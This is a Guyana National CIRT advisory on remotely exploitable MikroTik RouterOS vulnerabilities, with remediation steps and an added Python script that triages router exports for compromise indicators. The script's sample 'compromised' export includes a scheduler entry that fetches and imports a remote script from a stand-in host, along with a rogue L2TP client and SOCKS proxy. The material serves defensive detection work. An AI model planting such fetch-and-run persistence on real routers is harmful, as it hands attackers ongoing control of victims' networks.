MikroTik Devices Found Vulnerable to Remote Hacking Bugs (10th December 2021)

Ref# AL2021_53 | Date: Dec 10th 2021

Over 300,000 MikroTik devices were found to be susceptible to multiple remotely exploitable security vulnerabilities that have since been patched by the vendor.

Affected devices run RouterOS version 6.45.6 or older and have their WinBox management protocol exposed to the Internet.

Summary

MikroTik devices have become a favourite of malicious threat actors because they are both powerful and frequently left vulnerable. Threat actors have used them for almost everything from distributed denial of service (DDoS) attacks and command-and-control (C2) to traffic tunneling.

MikroTik devices are a tempting target because there are more than two million of them deployed worldwide, posing a huge attack surface that can be leveraged by malicious threat actors to organize a range of attacks.

How it Works

Researchers have compiled a list of four vulnerabilities, discovered over the last three years, that enable full takeover of MikroTik devices and that remain unpatched on many of them. These vulnerabilities are:

  • CVE-2019-3977 (CVSS score: 7.5) – MikroTik RouterOS insufficient validation of an upgrade package's origin, allowing a reset of all usernames and passwords
  • CVE-2019-3978 (CVSS score: 7.5) – MikroTik RouterOS insufficient protections of a critical resource, leading to cache poisoning
  • CVE-2018-14847 (CVSS score: 9.1) – MikroTik RouterOS directory traversal vulnerability in the WinBox interface
  • CVE-2018-7445 (CVSS score: 9.8) – MikroTik RouterOS SMB buffer overflow vulnerability

In addition to these vulnerabilities, it was also discovered that 20,000 MikroTik devices were injecting cryptocurrency mining scripts into web pages visited by users.

The compromised routers can inject malicious content and tunnel, copy or reroute traffic, all of which can be abused in highly destructive ways. DNS poisoning could redirect a remote worker's connection to a malicious website or introduce a machine-in-the-middle.

An attacker could also use well-known techniques and tools to capture sensitive information, such as stealing MFA codes from a remote user who receives SMS over Wi-Fi. As with previous attacks, enterprise traffic could be tunneled to another location or malicious content injected into valid traffic.

Remediation

  1. Upgrade RouterOS to v6.48.6 or v6.49.2 (or later).

  2. Use strong passwords.

  3. Avoid remote access; if it is necessary, do so through a virtual private network (VPN) service, and inspect your RouterOS configuration for unknown settings.

Configurations to look out for and remove:

  • System -> Scheduler rules that execute a Fetch script. Remove these.
  • IP -> Socks proxy. If you don't use this feature or don't know what it does, it must be disabled.
  • L2TP client named "lvpn" or any L2TP client that you don't recognize.
  • Input firewall rule that allows access for port 5678.
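As an added example (not code from this alert, from MikroTik or from the CIRT), the following Python script applies the version check and the configuration checks above to a saved copy of a router's "/export" output, so the indicators can be triaged across many devices without clicking through WinBox. It goes one step beyond the list above by also flagging an input rule that accepts the WinBox port from any source, which is the exposure precondition described at the top of this alert. The two sample exports are constructed for illustration; the export header format, the continuation-line handling and the WinBox port number 8291 are assumptions not stated in the alert.

```python
"""Triage a saved RouterOS '/export' for the indicators listed in this alert.
Added example, not MikroTik's or the CIRT's code."""
import re

LAST_VULNERABLE = (6, 45, 6)   # alert: RouterOS 6.45.6 or older is affected
INDICATOR_PORT = 5678          # alert: input rule allowing port 5678
WINBOX_PORT = 8291             # assumption: WinBox's default TCP port


def parse_version(text):
    """'6.45.6' or '6.48.6 (long-term)' -> (6, 45, 6); raises on junk."""
    m = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError(f"unrecognised RouterOS version: {text!r}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def is_vulnerable_version(text):
    return parse_version(text) <= LAST_VULNERABLE


_KV = re.compile(r'([\w-]+)=("(?:[^"\\]|\\.)*"|\S+)')   # key=value or key="quoted value"


def parse_export(export_text):
    """Return [(menu path, {key: value}), ...] for each add/set line of an export.
    Assumes the export breaks long lines only at spaces (trailing '\\', indented
    continuation line), which is how RouterOS prints them."""
    entries, section, pending = [], "", ""
    for raw in export_text.splitlines():
        line = pending + raw.strip()
        if line.endswith("\\"):
            pending = line[:-1]
            continue
        pending = ""
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):                    # menu path, e.g. /ip socks
            section = line
            continue
        entries.append((section, {k: v.strip('"') for k, v in _KV.findall(line)}))
    return entries


def _port_listed(spec, port):
    """True if a RouterOS port spec such as '5678' or '5000-6000,8291' covers port."""
    for item in spec.split(","):
        lo, _, hi = item.partition("-")
        if lo.isdigit() and int(lo) <= port <= int(hi if hi.isdigit() else lo):
            return True
    return False


def find_indicators(entries):
    findings = []
    fetch_scripts = {e.get("name") for s, e in entries
                     if s == "/system script" and "fetch" in e.get("source", "")}
    for section, e in entries:
        name = e.get("name", "?")
        if section == "/system scheduler":
            ev = e.get("on-event", "")
            if "fetch" in ev or ev in fetch_scripts:
                findings.append(f"scheduler: '{name}' runs a fetch script (on-event={ev})")
        elif section == "/ip socks" and e.get("enabled") == "yes":
            findings.append(f"socks: proxy enabled on port {e.get('port', '?')}")
        elif section == "/interface l2tp-client":
            tag = "name from the alert" if name == "lvpn" else "confirm it is yours"
            findings.append(f"l2tp: client '{name}' to {e.get('connect-to', '?')} ({tag})")
        elif (section == "/ip firewall filter" and e.get("chain") == "input"
              and e.get("action", "accept") == "accept"):        # action defaults to accept
            ports = e.get("dst-port", "")
            if _port_listed(ports, INDICATOR_PORT):
                findings.append(f"firewall: input rule accepts port {INDICATOR_PORT}")
            unrestricted = not any(k.startswith(("src-address", "in-interface")) for k in e)
            if _port_listed(ports, WINBOX_PORT) and unrestricted:
                findings.append(f"firewall: WinBox port {WINBOX_PORT} accepted from any source")
    return findings


def triage(export_text):
    m = re.search(r"by RouterOS (\S+)", export_text)   # version from the export header comment
    version = m.group(1) if m else None
    return {"version": version,
            "vulnerable_version": bool(version) and is_vulnerable_version(version),
            "findings": find_indicators(parse_export(export_text))}


# Constructed sample exports (not real captures): the first mirrors the indicators
# in this alert, the second is a cleaned device on a fixed release.
SAMPLE_COMPROMISED = """\
# dec/10/2021 09:00:00 by RouterOS 6.45.6
/interface l2tp-client
add connect-to=203.0.113.10 name=lvpn user=lvpn password=lvpn
/ip socks
set enabled=yes port=1080
/system script
add name=U6 source="/tool fetch url=http://203.0.113.10/poll/x.rsc mode=http \\
    dst-path=x.rsc; /import x.rsc"
/system scheduler
add interval=10m name=U6 on-event=U6 policy=ftp,reboot,read,write,policy,test
/ip firewall filter
add action=accept chain=input dst-port=5678 protocol=tcp
add action=accept chain=input dst-port=8291 protocol=tcp
add action=drop chain=input
"""

SAMPLE_CLEAN = """\
# dec/10/2021 09:00:00 by RouterOS 6.49.2
/ip socks
set enabled=no
/ip firewall filter
add action=accept chain=input dst-port=8291 protocol=tcp src-address=192.0.2.0/24
add action=drop chain=input
"""

if __name__ == "__main__":
    for label, sample in (("compromised", SAMPLE_COMPROMISED), ("clean", SAMPLE_CLEAN)):
        print(label, triage(sample))
```

Run it against a file captured with "/export" (WinBox: New Terminal, or SSH) rather than against the live device; a scheduler entry that references a script by name is caught only because the script's own source is inspected, which is why both menus are parsed together.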

For more information, kindly visit the following URL:

https://blog.mikrotik.com/security/meris-botnet.html

The Guyana National CIRT advises users and administrators review this alert and apply it where necessary.

References

https://www.bleepingcomputer.com/news/security/hundreds-of-thousands-of-mikrotik-devices-still-vulnerable-to-botnets/